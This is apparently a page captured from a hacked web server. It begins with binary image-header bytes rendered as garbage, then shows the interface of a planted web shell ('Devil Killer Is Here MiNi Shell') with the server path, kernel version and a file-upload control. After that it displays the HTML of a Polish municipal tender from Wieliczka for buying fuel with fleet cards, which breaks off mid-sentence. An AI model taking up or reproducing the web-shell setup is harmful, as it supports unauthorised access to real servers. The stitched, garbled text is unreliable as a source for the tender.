JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250210/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250210/0009764101-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Bezgotówkowy zakup paliw płynnych przy użyciu kart flotowych na potrzeby grupy zakupowej organizowanej przez Gminę Wieliczka </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzą zamawiający działający wspólnie</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA WIELICZKA</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 351555364</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Powstania Warszawskiego 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Wieliczka</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">32-020</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL214 - Krakowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">12 263 41 00</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">12 278 68 60</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">magistrat@wieliczka.eu</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.wieliczka.eu/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h3 class="mb-0">1.8.) Informacje o pozostałych zamawiających działających wspólnie</h3> <h3 class="p-2 mt-4 bg-light">Zamawiający <span class="normal">2</span></h3> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Straż Miejska w Wieliczce</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON: 351602721</span></h3> <h3 class="mb-0">1.5) Adres zamawiającego</h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Pl. Skulimowskiego 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Wieliczka</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">32-020</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubuskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL214 - Krakowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">12 278 21 05</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">12 2893510</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">straz@wieliczka.eu</span></h3> <h3 class="mb-0 ">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://bip.malopolska.pl/smwwieliczce</span></h3> <h3 class="p-2 mt-4 bg-light">Zamawiający <span class="normal">3</span></h3> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gminny Zarząd Dróg w Wieliczce</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 121398842</span></h3> <h3 class="mb-0">1.5) Adres zamawiającego</h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Lednicka 16a</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Wieliczka</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">32-020</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL214 - Krakowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">12 278-20-10</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">gzd@gzd.wieliczka.eu</span></h3> <h3 class="mb-0 ">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.gzd.wieliczka.eu/pl</span></h3> <h3 class="p-2 mt-4 bg-light">Zamawiający <span class="normal">4</span></h3> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zarząd Budynków Komunalnych w Wieliczce</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON: 120681270</span></h3> <h3 class="mb-0">1.5) Adres zamawiającego</h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Juliusza Słowackiego 51</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Wieliczka</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">32-020</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL214 - Krakowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">(12) 352-34-26,(12) 352-34-27</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">(12) 294-91-89</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zbk@wieliczka.eu</span></h3> <h3 class="mb-0 ">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://zbk.wieliczka.eu/</span></h3> <h3 class="p-2 mt-4 bg-light">Zamawiający <span class="normal">5</span></h3> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zarząd Cmentarza Komunalnego w Wieliczce</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON: 120681228</span></h3> <h3 class="mb-0">1.5) Adres zamawiającego</h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Marszałka Józefa Piłsudskiego 38</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Wieliczka</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">32-020</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL214 - Krakowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">12 278 30 04</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">12 278 30 04</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zck@wieliczka.eu</span></h3> <h3 class="mb-0 ">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.zckwieliczka.pl/</span></h3> <h3 class="p-2 mt-4 bg-light">Zamawiający <span class="normal">6</span></h3> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Solne Miasto spółka z ograniczoną odpowiedzialnością</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON: 120998511</span></h3> <h3 class="mb-0">1.5) Adres zamawiającego</h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Tadeusza Kościuszki 15</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Wieliczka</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">32-020</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL214 - Krakowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">12 297 39 50</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@solnemiasto.ue</span></h3> <h3 class="mb-0 ">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://solnemiasto.eu/</span></h3> <h3 class="mb-0">1.9.) Podział obowiązków – zamówienie wspólne</h3> <p class="mb-0">Gmina Wieliczka działa w imieniu własnym, oraz zgodnie z art. 38 ust. 2 ustawy Prawo zamówień publicznych, na podstawie zawartego porozumienia w imieniu wszystkich podmiotów wchodzących w skład grupy zakupowej, przy czym:<br/>1. Postępowanie przeprowadzi Zamawiający - Gmina Wieliczka - Urząd Miasta i Gminy w Wieliczce, ul. Powstania Warszawskiego 1, 32-020 Wieliczka.<br/>2. Umowy zostaną zawarte odrębnie przez każdego z Zamawiających.</p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Bezgotówkowy zakup paliw płynnych przy użyciu kart flotowych na potrzeby grupy zakupowej organizowanej przez Gminę Wieliczka </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-f9d0c4ac-cfbb-4bcc-8d23-b984638ebd05</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00097641</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-02-10</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00045221/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Bezgotówkowy zakup paliw płynnych przy użyciu kart flotowych na potrzeby grupy zakupowej organizowanej przez Gminę Wieliczka</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/transakcja/1059200 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcą odbywa się za pośrednictwem platformazakupowa.pl dostępnej pod adresem: https://platformazakupowa.pl/pn/wieliczka. Link bezpośredni: https://platformazakupowa.pl/transakcja/1059200</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a wykonawcą odbywa się za pośrednictwem platformazakupowa.pl<br/>2. Złożenie oferty następuje poprzez jej umieszczenie na platformazakupowa.pl, pod adresem: https://platformazakupowa.pl/pn/wieliczka. Link bezpośredni: https://platformazakupowa.pl/transakcja/1059200 . Po wypełnieniu Formularza składania oferty lub wniosku i dołączenia wszystkich wymaganych załączników należy kliknąć przycisk „Przejdź do podsumowania”. Oferta składana elektronicznie musi zostać podpisana elektronicznym podpisem kwalifikowanym, podpisem zaufanym lub podpisem osobistym.<br/>3. Wymaga się, aby komunikacja między zamawiającym a wykonawcami, w tym wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje (nie dotyczy oferty), przekazywane były w formie elektronicznej za pośrednictwem platformazakupowa.pl i formularza „Wyślij wiadomość do zamawiającego”. Za datę przekazania (wpływu) oświadczeń, wniosków, zawiadomień oraz informacji przyjmuje się datę ich przesłania za pośrednictwem platformazakupowa.pl poprzez kliknięcie przycisku „Wyślij wiadomość do zamawiającego” po których pojawi się komunikat, że wiadomość została wysłana do zamawiającego.<br/>4. Zamawiający będzie przekazywał wykonawcom informacje w formie elektronicznej za pośrednictwem platformazakupowa.pl. Informacje dotyczące odpowiedzi na pytania, zmiany specyfikacji, zmiany terminu składania i otwarcia ofert Zamawiający będzie zamieszczał na platformie w sekcji &#34;Komunikaty”. Korespondencja, której zgodnie z obowiązującymi przepisami adresatem jest konkretny wykonawca, będzie przekazywana w formie elektronicznej za pośrednictwem platformazakupowa.pl do konkretnego wykonawcy na adres e-mail podany w formularzu ofertowym, oraz na adres podany przez Wykonawcę przy składaniu oferty.<br/>5. Ofertę oraz dokumenty i oświadczenia składane wraz z ofertą, jak również wszelkie dokumenty i oświadczenia składane w trakcie postępowania, należy składać w formie elektronicznej (t.j. w postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/>6. Sposób sporządzenia dokumentów elektronicznych musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz.U. z 2020 r. poz. 2452) oraz w rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy (Dz.U. z 2020 poz. 2415 ze zm. ).<br/>7. Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia publicznego: - akceptuje warunki korzystania z platformazakupowa.pl określone w Regulaminie zamieszczonym na stronie internetowej https://platformazakupowa.pl/strona/1- regulamin oraz uznaje go za wiążący. - zapoznał i stosuje się do Instrukcji składania ofert/wniosków dostępnej pod adresem: https://platformazakupowa.pl/strona/45-instrukcje</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/>1.1) Administratorami Pani/Pana danych osobowych jest:<br/>1.1.1) Burmistrz Miasta i Gminy Wieliczka z siedzibą w Wieliczce, 32-020 Wieliczka, ul. Powstania Warszawskiego 1,<br/>1.1.2) Straż Miejska w Wieliczce, Pl. Skulimowskiego 2, 32-020 Wieliczka, <br/>1.1.3) Gminny Zarząd Dróg w Wieliczce, ul. Lednicka 16A, 32-020 Wieliczka,<br/>1.1.4) Zarząd Budynków Komunalnych w Wieliczce, ul. Słowackiego 51, 32-020 Wieliczka,<br/>1.1.5) Zarząd Cmentarza Komunalnego w Wieliczce, ul. Piłsudskiego 38, 32-020 Wieliczka,<br/>1.1.6) Solne Miasto spółka z ograniczoną odpowiedzialnością, ul. Tadeusza Kościuszki 15, 32-020 Wieliczka.<br/>1.2) Inspektorem ochrony danych osobowych w Urzędzie Miasta i Gminy w Wieliczce jest Pan Jacek Krzyżaniak – Inspektor Ochrony Danych: iod@wieliczka.eu;<br/>1.3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO (przetwarzanie jest niezbędne do wypełnienia obowiązku prawnego ciążącego na administratorze) w celu związanym z przedmiotowym postępowaniem o udzielenie zamówienia publicznego.<br/>1.4) Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ust. 1 ustawy z dnia 11 września 2019 – Prawo zamówień publicznych (tj.: Dz.U. z 2024 r. poz. 1320 ze zm.), dalej „ustawa Pzp”; <br/>1.5) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 i 4 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>1.6) Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp; <br/>1.7) W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/><br/>c.d. w punkcie 31 SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">BZP.271.1.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 257001,95 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1) Przedmiotem zamówienia jest bezgotówkowy zakup paliw płynnych przy użyciu kart flotowych na potrzeby jednostek Gminy Wieliczka zakup przy użyciu kart flotowych paliw płynnych silnikowych do pojazdów i urządzeń, w łącznej ilości:<br/>- olej napędowy: 43 125 litrów;<br/>- benzyna bezołowiowa 95-oktanowa (E10): 6 940 litrów.<br/>2) Dostawa paliw odbywać się będzie na potrzeby niżej wskazanych podmiotów zamawiających, w prognozowanej ilości dla każdego z tychże podmiotów:<br/>a) Gmina Wieliczka – dostawa paliwa na potrzeby pojazdów użytkowanych przez Urząd Miasta i Gminy w Wieliczce oraz na potrzeby jednostek Ochotniczych Straży Pożarnych z terenu gminy Wieliczka w prognozowanych ilościach:<br/>◦ olej napędowy: 30 375 litrów;<br/>◦ benzyna bezołowiowa 95-oktanowa (E10): 900 litrów.<br/>b) Straż Miejska w Wieliczce:<br/>◦ olej napędowy: 3 600 litrów;<br/>◦ benzyna bezołowiowa 95-oktanowa (E10): 2 400 litrów.<br/>c) Gminny Zarząd Dróg w Wieliczce:<br/>◦ olej napędowy: 4 350 litrów;<br/>◦ benzyna bezołowiowa 95-oktanowa (E10): 2 700 litrów. <br/>d) Zarząd Budynków Komunalnych w Wieliczce:<br/>◦ olej napędowy: 3 800 litrów;<br/>◦ benzyna bezołowiowa 95-oktanowa (E10): 590 litrów.<br/>e) Zarząd Cmentarza Komunalnego w Wieliczce:<br/>◦ benzyna bezołowiowa 95-oktanowa (E10): 150 litrów.<br/>f) Solne Miasto spółka z ograniczoną odpowiedzialnością:<br/>◦ olej napędowy: 1 000 litrów;<br/>◦ benzyna bezołowiowa 95-oktanowa (E10): 200 litrów.<br/>2.2) Wskazane, prognozowane ilości paliwa mają charakter orientacyjny i mogą odbiegać od faktycznie zakupionej, w okresie trwania umowy, ilości. Zmniejszenie lub zwiększenie ilości faktycznie zakupionego paliwa w stosunku do szacunkowej ilości, nie pociąga dla Zamawiającego (odbiorcy) żadnych konsekwencji, poza koniecznością dokonania zapłaty za faktycznie zakupione paliwo wg stawek określonych w zawartej umowie oraz nie może być przedmiotem roszczeń ze strony Wykonawcy. <br/>2.3) Uwaga! Przewiduje się zawarcie odrębnej umowy przez każdy z podmiotów zamawiających. Umowy będą zawierane w przedmiocie dotyczącym danego podmiotu oraz na warunkach określonych w wybranej ofercie. Wymaga się, aby warunki oferty (wysokość rabatu) były takie same dla wszystkich podmiotów zamawiających. Brak zawarcia umowy z którymkolwiek z podmiotów zamawiających skutkowało będzie nieważnością pozostałych umów. <br/>3) Realizacja zakupu paliw ciekłych odbywać się będzie:<br/>3.1) w rozliczeniu bezgotówkowym w systemie kart flotowych na terenie Polski;<br/>3.2) w stacjach paliwowych Wykonawcy lub operatorów posiadających stosowne porozumienie z Wykonawcą, pracujących w systemie całodobowym, z całodobową obsługą pracowników, we wszystkie dni tygodnia, za wyjątkiem sytuacji wyłączenia stacji z powodu awarii systemu obsługi, dostawy paliwa lub modernizacji, na stacjach paliw którymi będzie dysponował Wykonawca do realizacji zamówienia, tj.: co najmniej 120 (sto dwadzieścia) stacji paliw na terenie kraju (RP), w tym:<br/>a) co najmniej 12 stacji paliw musi znajdować się na terenie województwa małopolskiego, z czego co najmniej jedna stacja musi znajdować się na terenie Miasta Wieliczka, bądź w odległości maksymalnie do 5 km w linii prostej (mierzonej za pomocą funkcji „zmierz odległość” w google maps) od siedziby Zamawiającego (Wieliczka, ul Powstania Warszawskiego 1) do stacji paliw. Wykonawca zobowiązany jest wskazać w ofercie adres stacji paliw znajdującej się na terenie miasta Wieliczka, bądź w odległości maksymalnie do 5 km w linii prostej od siedziby Zamawiającego (Wieliczka, ul. Powstania Warszawskiego 1) na której będzie możliwy zakup paliwa. <br/>b) co najmniej po 4 stacje paliw na terenie każdego z pozostałych województw.<br/>Wszystkie stacje paliw płynnych muszą spełniać wymogi przewidziane w rozporządzeniu Ministra Gospodarki z dnia 21.11.2005 r. w sprawie warunków technicznych, jakimi powinny odpowiadać bazy i stacje paliw płynnych, rurociągi przesyłowe dalekosiężne służące do transportu ropy naftowej i 